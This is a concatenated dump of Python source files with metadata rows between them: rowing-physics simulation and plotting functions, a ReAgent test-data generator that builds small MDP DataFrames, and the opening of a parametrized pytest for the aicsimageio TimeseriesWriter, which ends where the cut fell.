        res = rowingphysics.constantwatt(watt,r,rg,aantal=10,aantal2=15,timestep=timestep,Fmin=Fmin,Fmax=Fmax)
        fres[i] = res[0]
        velocity[i] = res[1]
        ratios[i] = res[2]
        watts[i] = res[3]
        effs[i] = res[4]
        print((tempoos[i],velocity[i],watts[i],fres[i],effs[i]))
    # Normalise velocity to the power actually achieved (P ~ v^3 scaling).
    wattratio = (watts/watts[0])**(1./3.)
    velocity = velocity/wattratio
    res = rowingphysics.vavgto500mtime(velocity)
    mins500 = res[0]
    secs500 = res[1]
    # NOTE(review): secs500 is computed but not used below -- kept for parity
    # with the sibling plot functions; verify whether a 500m-split plot
    # was intended here.
    secs500 = secs500+60.*(mins500-1.)
    calctime = time.time()-tm
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (tempoos,velocity)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (tempoos,effs)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Efficiency')
        pyplot.subplot(223)
        pyplot.plot (tempoos,fres)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Average Stroke Force (N)')
        pyplot.subplot(224)
        pyplot.plot (tempoos,ratios)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Drive time fraction')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_catchangle_v_constantwatt(watt,r,rg,aantal=10,timestep=0.03):
    """ Plots boat speed, efficiency and 500m split versus catch angle at constant power.

    Sweeps the catch angle from -1.3 to -0.7 rad, solving for constant
    `watt` W at each angle.  Mutates rg.catchangle.  Returns the
    wall-clock calculation time in seconds.
    """
    # not tested
    tm = time.time()
    catchanglemin = -1.3
    catchanglemax = -0.7
    catchangles = linspace(catchanglemin,catchanglemax,aantal)
    velocity = zeros(aantal)
    eff = zeros(aantal)
    watts = zeros(aantal)
    for i in range(len(catchangles)):
        rg.catchangle = catchangles[i]
        res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
        velocity[i] = res[1]
        eff[i] = res[4]
        watts[i] = res[3]
        print((np.degrees(catchangles[i]),rg.dcatch,velocity[i],watts[i]))
    # Normalise velocity to the power actually achieved (P ~ v^3 scaling).
    wattratio = (watts/watts[0])**(1./3.)
    velocity = velocity/wattratio
    res = rowingphysics.vavgto500mtime(velocity)
    mins500 = res[0]
    secs500 = res[1]
    secs500 = secs500+60.*(mins500-1.)
    calctime = time.time()-tm
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (np.degrees(catchangles),velocity)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (np.degrees(catchangles),eff)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('Efficiency')
        pyplot.subplot(223)
        pyplot.plot (eff,velocity)
        pyplot.xlabel("Efficiency")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(224)
        pyplot.plot (np.degrees(catchangles),secs500)
        pyplot.xlabel("catch angle (o)")
        pyplot.ylabel('500m time')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_ratio_v_constantwatt(watt,r,rg,aantal=10,timestep=0.03):
    """ Plots velocity versus scull length / stroke ratio at three tempo/power settings.

    Runs three sweeps of rg.lscull (2.6..3.3 m) at (T=25, 280 W),
    (T=30, 320 W) and (T=35, 450 W) -- note the `watt` argument is
    overridden by these fixed values.  Saves each sweep to a text file
    and plots absolute and relative velocities.  Mutates r.tempo and
    rg.lscull.  Returns the wall-clock calculation time in seconds.
    """
    # untested
    tm = time.time()
    lscullmin = 2.6
    lscullmax = 3.3
    lsculls = linspace(lscullmin,lscullmax,aantal)
    velocity = zeros(aantal)
    eff = zeros(aantal)
    watts = zeros(aantal)
    ratios = zeros(aantal)
    velocity2 = zeros(aantal)
    eff2 = zeros(aantal)
    watts2 = zeros(aantal)
    ratios2 = zeros(aantal)
    velocity3 = zeros(aantal)
    eff3 = zeros(aantal)
    watts3 = zeros(aantal)
    ratios3 = zeros(aantal)
    r.tempo = 25.
    watt = 280.
    for i in range(len(lsculls)):
        rg.lscull = lsculls[i]
        res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
        velocity[i] = res[1]
        ratios[i] = res[2]
        eff[i] = res[4]
        watts[i] = res[3]
        print((r.tempo, lsculls[i],ratios[i],velocity[i],watts[i]))
    # Normalise each sweep to the power actually achieved (P ~ v^3).
    wattratio = (watts/watts[0])**(1./3.)
    velocity = velocity/wattratio
    relvel = velocity/max(velocity)
    r.tempo = 30.
    watt = 320.
    for i in range(len(lsculls)):
        rg.lscull = lsculls[i]
        res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
        velocity2[i] = res[1]
        ratios2[i] = res[2]
        eff2[i] = res[4]
        watts2[i] = res[3]
        print((r.tempo, lsculls[i],ratios2[i],velocity2[i],watts2[i]))
    wattratio = (watts2/watts2[0])**(1./3.)
    velocity2 = velocity2/wattratio
    # BUG FIX: this was assigned to `relvelb`, overwritten by the third
    # sweep below, leaving `relvela` undefined (NameError in the plots).
    relvela = velocity2/max(velocity2)
    r.tempo = 35.
    watt = 450.
    for i in range(len(lsculls)):
        rg.lscull = lsculls[i]
        res = rowingphysics.constantwatt(watt,r,rg,timestep=timestep)
        velocity3[i] = res[1]
        ratios3[i] = res[2]
        eff3[i] = res[4]
        watts3[i] = res[3]
        print((r.tempo, lsculls[i],ratios3[i],velocity3[i],watts3[i]))
    wattratio = (watts3/watts3[0])**(1./3.)
    velocity3 = velocity3/wattratio
    relvelb = velocity3/max(velocity3)
    # Persist the three sweeps for offline analysis.
    results = vstack((lsculls,velocity,eff,watts,ratios))
    savetxt('v_ratio_T25.txt',results)
    results2 = vstack((lsculls,velocity2,eff2,watts2,ratios2))
    savetxt('v_ratio_T30.txt',results2)
    results3 = vstack((lsculls,velocity3,eff3,watts3,ratios3))
    savetxt('v_ratio_T35.txt',results3)
    calctime = time.time()-tm
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (lsculls,velocity,'-g',label='280 W, T=25')
        pyplot.plot (lsculls,velocity2,'-r',label='320 W, T=30')
        pyplot.plot (lsculls,velocity3,'-b',label='450 W, T=35')
        pylab.legend(loc='best')
        pyplot.xlabel("L scull (m)")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(222)
        pyplot.plot (ratios,velocity,'-g',label='280 W, T=25')
        pyplot.plot (ratios2,velocity2,'-r',label='320 W, T=30')
        pyplot.plot (ratios3,velocity3,'-b',label='450 W, T=35')
        pylab.legend(loc='best')
        pyplot.xlabel("Ratio")
        pyplot.ylabel('Velocity (m/s)')
        pyplot.subplot(223)
        pyplot.plot (lsculls,relvel,'-g',label='280 W, T=25')
        pyplot.plot (lsculls,relvela,'-r',label='320 W, T=30')
        pyplot.plot (lsculls,relvelb,'-b',label='450 W, T=35')
        pylab.legend(loc='best')
        pyplot.xlabel("L scull (m)")
        pyplot.ylabel('Relative velocity')
        pyplot.subplot(224)
        pyplot.plot (ratios,relvel,'-g',label='280 W, T=25')
        pyplot.plot (ratios2,relvela,'-r',label='320 W, T=30')
        pyplot.plot (ratios3,relvelb,'-b',label='450 W, T=35')
        pylab.legend(loc='best')
        pyplot.xlabel("Ratio")
        pyplot.ylabel('Relative velocity')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_tempo_power_constantv(velo,r,rg,aantal=10,timestep=0.03,
                               Fmin=50,Fmax=650):
    """ Plots power needed to achieve certain boat speed at various stroke rates

    Sweeps the stroke rate from 24 to 33 spm, solving for the force that
    holds boat speed `velo`, and plots power, efficiency, stroke force
    and drive-time fraction versus tempo.  Mutates r.tempo.  Returns the
    wall-clock calculation time in seconds.
    """
    tm = time.time()
    tempomin = 24
    tempomax = 33
    tempoos = linspace(tempomin,tempomax,aantal)
    velocity = zeros(aantal)
    ratios = zeros(aantal)
    watts = zeros(aantal)
    peakforce = zeros(aantal)
    eff = zeros(aantal)
    for i in range(len(tempoos)):
        r.tempo = tempoos[i]
        res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep,Fmin=Fmin,Fmax=Fmax)
        velocity[i] = res[1]
        ratios[i] = res[2]
        watts[i] = res[3]
        eff[i] = res[4]
        peakforce[i] = res[0]
        print((tempoos[i],velocity[i],watts[i],peakforce[i]))
    calctime = time.time()-tm
    # Correct power for the velocity actually reached (P ~ v^3 scaling).
    watts = watts*(velocity/velocity[0])**3
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (tempoos,watts)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Power (W)')
        pyplot.subplot(222)
        pyplot.plot (tempoos,eff)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Efficiency')
        pyplot.subplot(223)
        pyplot.plot (tempoos,peakforce)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Average Stroke Force (N)')
        pyplot.subplot(224)
        pyplot.plot (tempoos,ratios)
        pyplot.xlabel("tempo (spm)")
        pyplot.ylabel('Drive time fraction')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_inboard_power_constantv(velo,r,rg,aantal=10,timestep=0.03):
    """ Plots power at given boat speed for various values of inboard

    Sweeps the inboard length from 86 to 92 cm, solving for constant
    boat speed `velo` at each value.  Mutates rg.lin.  Returns the
    wall-clock calculation time in seconds.
    """
    tm = time.time()
    linmin = 86.0
    linmax = 92.
    lins = linspace(linmin,linmax,aantal)
    velocity = zeros(aantal)
    ratios = zeros(aantal)
    watts = zeros(aantal)
    peakforce = zeros(aantal)
    eff = zeros(aantal)
    for i in range(len(lins)):
        rg.lin = lins[i]/100.  # sweep values are in cm; rigging wants m
        res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep)
        velocity[i] = res[1]
        ratios[i] = res[2]
        watts[i] = res[3]
        eff[i] = res[4]
        # estimate peak force from the average force
        peakforce[i] = (0.5+0.25*pi)*res[0]
        print((lins[i],velocity[i],watts[i],peakforce[i]))
    calctime = time.time()-tm
    # plotjes (only the power panel is shown; the efficiency and force
    # panels were disabled in the original and have been removed)
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.plot (lins,watts)
        pyplot.xlabel("Inboard (cm)")
        pyplot.ylabel('Power (W)')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def plot_boatweight_power_constantv(velo,r,rg,aantal=10,timestep=0.01):
    """ Plots power at a given boat speed for varying boat weight.

    Sweeps rg.mb from 14 to 40 kg, solving for constant boat speed
    `velo` at each weight, then restores the original rg.mb.  Returns
    the wall-clock calculation time in seconds.
    """
    tm = time.time()
    mborg = rg.mb  # remember original boat weight so we can restore it
    mbmin = 14.0
    mbmax = 40.0
    mbs = linspace(mbmin,mbmax,aantal)
    velocity = zeros(aantal)
    ratios = zeros(aantal)
    watts = zeros(aantal)
    peakforce = zeros(aantal)
    eff = zeros(aantal)
    for i in range(len(mbs)):
        rg.mb = mbs[i]
        res = rowingphysics.constantvelo(velo,r,rg,timestep=timestep,aantal2=10,Fmin=100,Fmax=700)
        velocity[i] = res[1]
        ratios[i] = res[2]
        watts[i] = res[3]
        eff[i] = res[4]
        # estimate peak force from the average force
        peakforce[i] = (0.5+0.25*pi)*res[0]
        print((mbs[i],velocity[i],watts[i],peakforce[i]))
    calctime = time.time()-tm
    rg.mb = mborg  # restore caller's rigging
    # plotjes
    try:
        pyplot.clf()  # fixed: was `pyplot.clf` (missing call, figure never cleared)
        pyplot.subplot(221)
        pyplot.plot (mbs,watts)
        pyplot.xlabel("Boat Weight (kg)")
        pyplot.ylabel('Power (W)')
        pyplot.subplot(222)
        pyplot.plot (mbs,eff)
        pyplot.xlabel("Boat Weight (kg)")
        pyplot.ylabel('Efficiency')
        pyplot.subplot(223)
        pyplot.plot (mbs,peakforce)
        pyplot.xlabel("Boat Weight (kg)")
        pyplot.ylabel('Average Stroke Force (N)')
        pyplot.show()
    except NameError:
        print("No plotting today")
    return calctime
def atkinson(timestep=0.01,factor=0.45,doplot=1,h1=0.75,h2=1.0,
             timewise=0,x1=0.02,x2=0.39,bladearea=0.071,
             lscull=3.05,lin=0.86,strokelength=1.31,constantdrag=0):
    """ Single-scull test case run through the Atkinson model.

    Builds a crew with a trapezium stroke profile and a rigging set-up,
    converges the simulation to a steady-state velocity, runs a final
    atkinsoncalc with plotting/printing enabled, and prints a summary.
    Returns the wall-clock calculation time in seconds.
    """
    from .crew import trapezium
    from .crew import trianglerecovery,sinusrecovery,flatrecovery
    # Scenario set-up: single rower, trapezium force profile.
    r = crew(mc=90.0,tempo=29.4,strokelength=strokelength)
    r.strokeprofile = trapezium(x1=x1,x2=x2,h1=h1,h2=h2)
    ratio = r.strokeprofile.ratio
    rg = rigging(mb=14.,catchangle=-1.18,lin=lin,
                 bladearea=bladearea,lscull=lscull)
    # Leverage factor (outboard/inboard).  NOTE(review): james_hm2min
    # uses the inverse form lscull/(lscull-lin) -- confirm which is intended.
    factor2 = (rg.lscull-rg.lin)/rg.lin
    F = ratio*368.*factor*factor2
    aantal=100
    # Sample the handle force profile along the stroke (y1 is not used
    # further in this function).
    x = linspace(0,r.strokelength,aantal)
    y1 = zeros(aantal)
    for i in range(len(x)):
        y1[i] = r.forceprofile(F,x[i])
    # Get up to speed: iterate until the end velocity converges.
    dv = 1.0
    vend = 4.0
    tm = time.time()
    while (dv/vend > 0.001):
        res = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,0,timewise=timewise,constantdrag=constantdrag)
        dv = res[0]
        vend = res[1]
    res = rowingphysics.stroke_atkinson(F,r,rg,vend,timestep,10,timewise=timewise,constantdrag=constantdrag)
    velocity = res[2]
    ratios = res[3]
    energies = res[4]
    power = res[5]
    # Final run with plotting/printing enabled for inspection.
    res2 = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,doplot=doplot,doprint=1,
                                      timewise=timewise,constantdrag=constantdrag)
    velocity2 = res2[2]
    ratios2 = res2[3]
    energies2 = res2[4]
    power2 = res2[5]
    # Print the drag equation diagnostics for the converged velocity.
    displacement = rg.mb+rg.Nrowers*r.mc
    res = rowingphysics.drag_eq(displacement,velocity,alfaref=3.2,doprint=1,constantdrag=constantdrag)
    print(("Velocity :",velocity," m/s"))
    print(("Ratio :",ratios))
    print(("Power :",power," W"))
    print(("Energy :",energies," J"))
    print(("dv :",res2[0]))
    print(("vend :",res2[1]))
    print(("vmin :",res2[7]))
    print(("vmax :",res2[8]))
    calctime = time.time()-tm
    return calctime
def james_hm2min(timestep=0.01,factor=0.86,doplot=1,h1=1.0,h2=0.8,
                 timewise=0,x1=0.03,x2=0.35,bladearea=1.212e-1):
    """ Coxless-pair test case run through the Atkinson model.

    Builds a two-rower sweep crew with a trapezium stroke profile,
    converges the simulation to a steady-state velocity, runs a final
    atkinsoncalc with plotting/printing enabled, and prints a summary.
    Returns the wall-clock calculation time in seconds.
    """
    from .crew import trapezium
    from .crew import trianglerecovery,sinusrecovery,flatrecovery
    # Scenario set-up: two rowers, sweep oars.
    r = crew(mc=88.5,tempo=36.0,strokelength=1.37)
    r.strokeprofile = trapezium(x1=x1,x2=x2,h1=h1,h2=h2)
    ratio = r.strokeprofile.ratio
    rg = rigging(Nrowers=2,mb=27.,roworscull='row',catchangle=-1.18,lin=1.16,
                 bladearea=bladearea,bladelength=0.55,spread=0.86,lscull=3.76)
    # Leverage factor.  NOTE(review): atkinson() uses the inverse form
    # (lscull-lin)/lin -- confirm which is intended.
    factor2 = rg.lscull/(rg.lscull-rg.lin)
    F = ratio*368.*factor*factor2
    aantal=100
    # Sample the handle force profile along the stroke (y1 is not used
    # further in this function).
    x = linspace(0,r.strokelength,aantal)
    y1 = zeros(aantal)
    for i in range(len(x)):
        y1[i] = r.forceprofile(F,x[i])
    # Get up to speed: iterate until the end velocity converges.
    dv = 1.0
    vend = 4.0
    tm = time.time()
    while (dv/vend > 0.001):
        res = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,0,timewise=timewise)
        dv = res[0]
        vend = res[1]
    res = rowingphysics.stroke_atkinson(F,r,rg,vend,timestep,10,timewise=timewise)
    velocity = res[2]
    ratios = res[3]
    energies = res[4]
    power = res[5]
    # Final run with plotting/printing enabled for inspection.
    res2 = rowingphysics.atkinsoncalc(F,r,rg,vend,timestep,doplot=doplot,doprint=1,
                                      timewise=timewise)
    velocity2 = res2[2]
    ratios2 = res2[3]
    energies2 = res2[4]
    power2 = res2[5]
    print(("Velocity :",velocity," m/s"))
    print(("Ratio :",ratios))
    print(("Power :",power," W"))
    print(("Energy :",energies," J"))
    print(("dv :",res[0]))
    calctime = time.time()-tm
    return calctime
def powerseries(powers,r,rg):
    """Print the predicted 500 m boat split for each power value.

    For every wattage in *powers*, the steady-state speed is computed with
    rowingphysics.constantwatt and converted to a mins:secs split.

    Example: powerseries([200,250,300],r,rg)
    """
    for watts in powers:
        steady = rowingphysics.constantwatt(watts, r, rg)
        mins, secs = rowingphysics.vavgto500mtime(steady[1])
        print((watts, 'W ', mins, ':', secs))
def ergtoboat(splits,r,rg,tempos,erg):
    """Translate erg splits into predicted on-water boat splits.

    For every stroke rate in *tempos*, each (mins, secs) erg split in
    *splits* is converted to erg power and total power via
    rowingphysics.ergtopower, and the resulting boat split is printed.
    Mutates r.tempo as a side effect.
    """
    ratio = 0.5  # fixed stroke/recovery ratio used for the erg conversion
    for tempo in tempos:
        r.tempo = tempo
        print("----------------------------------------")
        print(("Tempo ",tempo, " /min"))
        print("")
        print("erg split erg P total P boat split")
        for split in splits:
            mins, secs = split[0], split[1]
            power_res = rowingphysics.ergtopower(mins, secs, ratio, r, erg)
            totalpower, ergpower = power_res[0], power_res[1]
            boat = rowingphysics.constantwatt(totalpower, r, rg)
            bmins, bsecs = rowingphysics.vavgto500mtime(boat[1])
            bmins = int(bmins)
            bsecs = int(10 * bsecs) / 10.0  # truncate seconds to one decimal
            print((mins,":",secs," ",int(ergpower)," ",int(totalpower)," ",bmins,":",bsecs))
def tempopower(r,rg,tp,pw):
    """Print stroke data and the 500 m split for rowing at *pw* watts.

    NOTE(review): the *tp* argument is accepted but never used here; kept
    for interface compatibility with existing callers.
    """
    result = rowingphysics.constantwatt(pw, r, rg, timestep=0.01, aantal=15, aantal2=15)
    print((pw, result[3]))
    split = rowingphysics.vavgto500mtime(result[1])
    print(('Split ', split))
def tempopowererg(r,rg,erg,tp,pwd,theconst=0.0):
    """Convert an erg display power to on-water power and print the split.

    First solves for the total power matching the erg display value *pwd*,
    then feeds that power into the on-water model and prints the result.
    NOTE(review): *tp* is accepted but unused, mirroring tempopower().
    """
    erg_res = rowingphysics.constantwatt_ergdisplay(pwd, r, erg, timestep=0.01, aantal=10, aantal2=10, theconst=theconst)
    print(erg_res)
    pw = erg_res[3]
    water_res = rowingphysics.constantwatt(pw, r, rg, timestep=0.01, aantal=15, aantal2=15)
    print((pw, water_res[3]))
    print(('Split ', rowingphysics.vavgto500mtime(water_res[1])))
| 29.153015
| 111
| 0.576758
| 10,364
| 83,640
| 4.632188
| 0.046218
| 0.061865
| 0.019997
| 0.030662
| 0.873334
| 0.864585
| 0.830695
| 0.804637
| 0.791014
| 0.774871
| 0
| 0.054513
| 0.272716
| 83,640
| 2,868
| 112
| 29.16318
| 0.734703
| 0.02023
| 0
| 0.811131
| 0
| 0
| 0.057868
| 0.000893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014142
| false
| 0
| 0.011405
| 0
| 0.036496
| 0.025547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13e633aed889584422d52608f5581e1e00c11c65
| 5,595
|
py
|
Python
|
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
reagent/test/workflow/test_data/ex_mdps.py
|
JiayingClaireWu/ReAgent
|
3f2365c5bab396b3e965f77cd8d4f0ac15ae2f7b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
from typing import Tuple
import pandas
def generate_discrete_mdp_pandas_df(
    multi_steps: bool,
    use_seq_num_diff_as_time_diff: bool
    # pyre-fixme[11]: Annotation `DataFrame` is not defined as a type.
) -> Tuple[pandas.DataFrame, str]:
    """Build a 4-step discrete-action MDP as a pandas DataFrame.

    Simulated episode:
        state 0 -'L'-> state 1 -'R'-> state 4 -'U'-> state 5 -'D'-> state 6 (terminal)
    with rewards 0, 1, 4, 5 on the four transitions.

    When multi_steps is True the reward / next-state / next-action columns
    carry two-step lookahead lists (the last row has a single step).
    Otherwise they hold single-step values, and
    use_seq_num_diff_as_time_diff chooses between uniform time diffs
    ([1, 1, 1, 1]) and sequence-number-derived ones ([1, 3, 1, 1]).

    Returns (df, ds) where ds is the partition date string.
    """
    step_actions = ["L", "R", "U", "D"]
    step_possible_actions = [["L", "R"], ["R", "U"], ["U", "D"], ["D"]]
    if not multi_steps:
        step_rewards = [0, 1, 4, 5]
        step_metrics = [{"reward": 0}, {"reward": 1}, {"reward": 4}, {"reward": 5}]  # noqa
        step_next_states = [{1: 1}, {4: 1}, {5: 1}, {6: 1}]
        step_next_actions = ["R", "U", "D", ""]
        step_possible_next_actions = [["R", "U"], ["U", "D"], ["D"], [""]]
        # terminals = [0, 0, 0, 1]
        if use_seq_num_diff_as_time_diff:
            step_time_diffs = [1, 1, 1, 1]  # noqa
        else:
            step_time_diffs = [1, 3, 1, 1]  # noqa
    else:
        # Two-step lookahead variant (assumes multi_steps=2).
        step_rewards = [[0, 1], [1, 4], [4, 5], [5]]
        step_metrics = [
            [{"reward": 0}, {"reward": 1}],
            [{"reward": 1}, {"reward": 4}],
            [{"reward": 4}, {"reward": 5}],
            [{"reward": 5}],
        ]
        step_next_states = [[{1: 1}, {4: 1}], [{4: 1}, {5: 1}], [{5: 1}, {6: 1}], [{6: 1}]]
        step_next_actions = [["R", "U"], ["U", "D"], ["D", ""], [""]]
        step_possible_next_actions = [
            [["R", "U"], ["U", "D"]],
            [["U", "D"], ["D"]],
            [["D"], [""]],
            [[""]],
        ]
        # terminals = [[0, 0], [0, 0], [0, 1], [1]]
        step_time_diffs = [[1, 1], [1, 1], [1, 1], [1]]
    num_rows = 4
    partition = "2019-07-17"
    # pyre-fixme[16]: Module `pandas` has no attribute `DataFrame`.
    frame = pandas.DataFrame(
        {
            "mdp_id": ["0"] * num_rows,
            "sequence_number": [0, 1, 4, 5],
            "sequence_number_ordinal": [1, 2, 3, 4],
            "state_features": [{0: 1}, {1: 1}, {4: 1}, {5: 1}],
            "action": step_actions,
            "action_probability": [0.3, 0.4, 0.5, 0.6],
            "reward": step_rewards,
            "next_state_features": step_next_states,
            "next_action": step_next_actions,
            "time_diff": step_time_diffs,
            "possible_actions": step_possible_actions,
            "possible_next_actions": step_possible_next_actions,
            "metrics": step_metrics,
            "ds": [partition] * num_rows,
        }
    )
    return frame, partition
def generate_parametric_mdp_pandas_df(
    multi_steps: bool, use_seq_num_diff_as_time_diff: bool
):
    """Build a 4-step parametric-action MDP as a pandas DataFrame.

    Same episode as generate_discrete_mdp_pandas_df (states 0 -> 1 -> 4 ->
    5 -> 6, rewards 0/1/4/5) but with actions encoded as feature dicts
    ({7: 1} .. {10: 1}) instead of string labels.

    Returns (df, ds) where ds is the partition date string.
    """
    step_actions = [{7: 1}, {8: 1}, {9: 1}, {10: 1}]
    step_possible_actions = [
        [{7: 1}, {8: 1}],
        [{8: 1}, {9: 1}],
        [{9: 1}, {10: 1}],
        [{10: 1}],
    ]
    if not multi_steps:
        step_rewards = [0, 1, 4, 5]
        step_metrics = [{"reward": 0}, {"reward": 1}, {"reward": 4}, {"reward": 5}]  # noqa
        step_next_states = [{1: 1}, {4: 1}, {5: 1}, {6: 1}]
        step_next_actions = [{8: 1}, {9: 1}, {10: 1}, {}]
        step_possible_next_actions = [[{8: 1}, {9: 1}], [{9: 1}, {10: 1}], [{10: 1}], [{}]]
        # terminals = [0, 0, 0, 1]
        if use_seq_num_diff_as_time_diff:
            step_time_diffs = [1, 1, 1, 1]  # noqa
        else:
            step_time_diffs = [1, 3, 1, 1]  # noqa
    else:
        # Two-step lookahead variant (assumes multi_step=2).
        step_rewards = [[0, 1], [1, 4], [4, 5], [5]]
        step_metrics = [
            [{"reward": 0}, {"reward": 1}],
            [{"reward": 1}, {"reward": 4}],
            [{"reward": 4}, {"reward": 5}],
            [{"reward": 5}],
        ]
        step_next_states = [[{1: 1}, {4: 1}], [{4: 1}, {5: 1}], [{5: 1}, {6: 1}], [{6: 1}]]
        step_next_actions = [[{8: 1}, {9: 1}], [{9: 1}, {10: 1}], [{10: 1}, {}], [{}]]
        step_possible_next_actions = [
            [[{8: 1}, {9: 1}], [{9: 1}, {10: 1}]],
            [[{9: 1}, {10: 1}], [{10: 1}]],
            [[{10: 1}], [{}]],
            [[{}]],
        ]
        # terminals = [[0, 0], [0, 0], [0, 1], [1]]
        step_time_diffs = [[1, 1], [1, 1], [1, 1], [1]]
    num_rows = 4
    partition = "2019-07-17"
    # pyre-fixme[16]: Module `pandas` has no attribute `DataFrame`.
    frame = pandas.DataFrame(
        {
            "mdp_id": ["0"] * num_rows,
            "sequence_number": [0, 1, 4, 5],
            "sequence_number_ordinal": [1, 2, 3, 4],
            "state_features": [{0: 1}, {1: 1}, {4: 1}, {5: 1}],
            "action": step_actions,
            "action_probability": [0.3, 0.4, 0.5, 0.6],
            "reward": step_rewards,
            "next_state_features": step_next_states,
            "next_action": step_next_actions,
            "time_diff": step_time_diffs,
            "possible_actions": step_possible_actions,
            "possible_next_actions": step_possible_next_actions,
            "metrics": step_metrics,
            "ds": [partition] * num_rows,
        }
    )
    return frame, partition
| 34.96875
| 86
| 0.456479
| 719
| 5,595
| 3.385257
| 0.140473
| 0.026294
| 0.019721
| 0.016434
| 0.889482
| 0.882087
| 0.881265
| 0.870583
| 0.850863
| 0.846754
| 0
| 0.086394
| 0.323503
| 5,595
| 159
| 87
| 35.188679
| 0.556671
| 0.158534
| 0
| 0.66129
| 1
| 0
| 0.114982
| 0.018807
| 0
| 0
| 0
| 0.006289
| 0
| 1
| 0.016129
| false
| 0
| 0.016129
| 0
| 0.048387
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b971ee9acbe59bc8c60ab762a3564d151543ee3a
| 4,834
|
py
|
Python
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 110
|
2019-06-27T16:46:53.000Z
|
2022-03-14T10:37:22.000Z
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 359
|
2019-06-27T17:50:08.000Z
|
2022-03-30T20:33:10.000Z
|
aicsimageio/tests/writers/test_timeseries_writer.py
|
brisvag/aicsimageio
|
d372e0d3699ba48adcba0a2c69a1434f0be45e47
|
[
"BSD-3-Clause"
] | 26
|
2020-03-11T20:51:06.000Z
|
2022-03-18T20:16:51.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from typing import Callable, Tuple
import numpy as np
import pytest
from aicsimageio import exceptions
from aicsimageio.readers.default_reader import DefaultReader
from aicsimageio.writers.timeseries_writer import TimeseriesWriter
from ..conftest import LOCAL, array_constructor, get_resource_write_full_path
@array_constructor
@pytest.mark.parametrize(
    "write_shape, write_dim_order, read_shape, read_dim_order",
    [
        ((30, 100, 100), None, (30, 100, 100), "TYX"),
        # Note that files get saved out with RGBA, instead of just RGB
        ((30, 100, 100, 3), None, (30, 100, 100, 4), "TYXS"),
        ((100, 30, 100), "XTY", (30, 100, 100), "TYX"),
        # Note that files get saved out with RGBA, instead of just RGB
        ((3, 100, 30, 100), "SYTX", (30, 100, 100, 4), "TYXS"),
        # Invalid shapes / dim orders below must raise.
        pytest.param(
            (1, 1),
            None,
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1, 1),
            None,
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1, 1, 1),
            "STCZYX",
            None,
            None,
            marks=pytest.mark.raises(exception=exceptions.UnexpectedShapeError),
        ),
        pytest.param(
            (1, 1, 1, 1),
            "ABCD",
            None,
            None,
            marks=pytest.mark.raises(
                exception=exceptions.InvalidDimensionOrderingError
            ),
        ),
    ],
)
